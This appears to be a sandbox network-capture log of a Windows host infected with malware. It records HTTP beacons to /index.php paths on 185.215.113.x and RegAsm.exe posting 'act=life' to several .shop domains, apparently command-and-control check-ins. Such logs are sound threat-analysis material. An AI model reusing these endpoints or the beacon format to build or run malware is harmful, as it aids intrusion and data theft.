Sep 27, 2024 04:22:05.837939024 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:22:05.880738020 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:22:06.121848106 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.5	49826	185.215.113.16	80

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:22:05.988178015 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:22:07.426043034 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:22:07.426234961 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:22:07.427252054 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:22:07.431782961 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 04:22:07.653465033 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.5	49828	185.215.113.26	80

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:22:06.373513937 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:22:06.665585995 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:22:07.056168079 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:22:07.427237988 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:22:07.427341938 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:22:07.429296970 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:22:07.666054010 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.5	49830	185.215.113.16	80

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:22:07.792068005 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:22:08.488723040 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:22:08.494803905 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 04:22:08.722439051 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.5	49831	185.215.113.26	80

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:22:07.803957939 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:22:08.491035938 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:22:08.493088961 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:22:08.720652103 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.5	49833	185.215.113.26	80

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:22:08.829982996 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:22:09.560180902 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.5	49834	185.215.113.16	80

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:22:08.847485065 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:22:09.572827101 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:22:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49761	172.67.162.108	443	428	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 02:21:40 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: drawzhotdog.shop
2024-09-27 02:21:40 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-27 02:21:40 UTC	766	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=purq5fm071nunijurgfa6f2gb4; expires=Mon, 20 Jan 2025 20:08:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3iYXsKes6oer1bA%2BmnEZVs0pJqmO1qpxXVDUpzXyXviFFs0Z4QEJq61QlkwdhdfgycEdStDApBSFJe99RtAkP09omyt2C62KVpUMxnQyFs72Pwdggz%2BleXhrMeB4Iz9Fh%2B0Q"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c980587ccb443bc-EWR
2024-09-27 02:21:40 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-27 02:21:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49764	104.21.4.136	443	428	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 02:21:41 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: gutterydhowi.shop
2024-09-27 02:21:41 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-27 02:21:41 UTC	778	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=134eati16bj37th9ii1mta4pq8; expires=Mon, 20 Jan 2025 20:08:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qUWD7WH24CRDWaoZjzgqWrRpOA1Y%2FMUAC9xeGitL81toBrvh1wvb9QGJlIdqHG6TaDYhX%2F5%2BaAyv0Q6qUrG2z1hkTzXHWnkxsSJCq5kr2Adfc%2ForNXj%2FmbSu6T7G9ErVctjDpA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c98058df9497291-EWR
2024-09-27 02:21:41 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-27 02:21:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49768	188.114.97.3	443	428	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 02:21:42 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ghostreedmnu.shop
2024-09-27 02:21:42 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-27 02:21:42 UTC	774	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=f6em2j2ggislu8i8v4hp9tc8gg; expires=Mon, 20 Jan 2025 20:08:21 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0MN5lnrsHTbvFKLcbZLm4HsAh8jMFVYb6lYx6XXEaJdwNtWoCbMgf9kRtz0uZhnminZZ0i0BpgbenScd8kdWkMPQ84NV0iYKkB4O8%2BnqmAY%2Bu0cXvVn7rs9l2p0UefjfIMtx%2FA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c980593dae142a9-EWR
2024-09-27 02:21:42 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-27 02:21:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49770	188.114.96.3	443	428	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 02:21:43 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: offensivedzvju.shop
2024-09-27 02:21:43 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-27 02:21:43 UTC	774	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ts6u9i20rslbjm1dvlus7se6pr; expires=Mon, 20 Jan 2025 20:08:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QYXLMlFccS1x%2FX3JeJ6OT4OXgh8KtQuhU%2Fw7DVp8oGzKN4iXdp4zPTc5h6VOum%2FCsLYihywkaGZboYBM8pi%2BNWX7jOG45d9MF4kiikMnyGp9eOZnQ1VZZfg7z%2FaQyFgArHevRte3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c98059a5da843e0-EWR
2024-09-27 02:21:43 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-27 02:21:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49772	188.114.96.3	443	428	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 02:21:44 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: vozmeatillu.shop
2024-09-27 02:21:44 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-27 02:21:44 UTC	766	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=73ouf5fdo9p87lr03frlk0vg23; expires=Mon, 20 Jan 2025 20:08:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s%2FdKSktAXdpKHqTkCG0jcZabfFpXDrY73AgpIlWRZ8J5O29%2FWnuDKg5OXpFTnEID9zSvwU99Y%2BVIaqYLFS7fpxIOwHpZzLnF4T3k95Q4eVjE984dOvxptF5gWR0dR7m9kkr3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9805a0cde74313-EWR
2024-09-27 02:21:44 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-27 02:21:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49775	172.67.162.108	443	428	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 02:21:45 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: drawzhotdog.shop
2024-09-27 02:21:45 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-27 02:21:45 UTC	770	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gjs3rlouqdgv5n397a5fgqk2em; expires=Mon, 20 Jan 2025 20:08:24 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rg75GuV0wzt6t4cS2y%2BKtkTHruLTgqkFZxjysvQXq%2FCln3D4Je8va9uSvyQXe%2BFlvGT6aJwdx1e%2FuvSmgE02Sjj5G0QSjBipqNmsiWcXCRZcVqe4MeAKkz%2BMvgUOsLJ2GmDZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9805a77d510cb2-EWR
2024-09-27 02:21:45 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-27 02:21:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49777	188.114.97.3	443	428	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 02:21:46 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fragnantbui.shop
2024-09-27 02:21:46 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-27 02:21:46 UTC	766	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cctggl362qpd5nedunjtecd2h0; expires=Mon, 20 Jan 2025 20:08:25 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kGuLyD36M2xyTZ7%2Fsside3ivRtC7ZCoBhc%2FkBkqd3X8yXPhgYkE43ABLgAxpgKf7LPWMYpCOf5TVnXJrqGQ5FGTUuLnMnB1TcOEYfbuvqghIwz%2BIg2l5zUwS0JnUBpqIgotd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9805ae5dac1a44-EWR
2024-09-27 02:21:46 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-27 02:21:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49779	188.114.96.3	443	428	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 02:21:47 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: stogeneratmns.shop
2024-09-27 02:21:47 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-27 02:21:47 UTC	770	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:21:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=53av71jkf6dj7b7nl5vpecd43e; expires=Mon, 20 Jan 2025 20:08:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UeCoU2eL1FdaAt3Vr9SDyhJncsMyptBHsWewzEI6YuIOPX6Xtz3hs2GMizObTmj0LiLvr9DHnmwTDUvTZZA%2BfTPJepoVlw7oVJV8eisErmss0ASd7C2%2BgGCS1V8kZLtwvGPQt58%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9805b47e5532ca-EWR
2024-09-27 02:21:47 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
